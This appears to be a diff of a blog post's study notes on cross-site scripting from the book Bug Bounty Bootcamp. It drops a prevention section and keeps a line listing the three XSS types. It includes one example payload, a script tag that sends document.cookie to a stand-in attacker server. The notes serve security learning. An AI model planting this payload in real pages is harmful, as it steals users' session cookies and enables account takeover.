init0x1/init0x1.github.io/_posts/cyber-security/web-security/books/Bug_Bounty_Bootcamp_The_Guide_to_Finding_and_Reporting_Web_Vulnerabilities/2023-7-20-Bug Bounty Bootcamp chapter6 CROSS-SITE SCRIPTING.md

 4. Stealing user cookies: The attacker uses the `document.cookie` property to access and send the user’s cookies to a malicious server.
 For example: `<script>image = new Image(); image.src='http://attacker_server_ip/?c='+document.cookie;</script>`.

-# After All

-## XSS Prevention

-The best way to prevent XSS attacks is to apply proper input validation and output encoding for all user input.
-Input validation means checking and filtering the user input before processing it.
-Output encoding means converting the user input into a safe format before inserting it into a web page.
-For example, HTML entities can be used to encode special characters that have meaning in HTML, such as `<`, `>`, `"`, `'`, and `&`.
-There are also other techniques and tools that can help prevent XSS, such as using HTTP-only cookies, implementing content security policy (CSP), and using web application firewalls (WAF).

 # Types of XSS

 There are three main types of XSS attacks: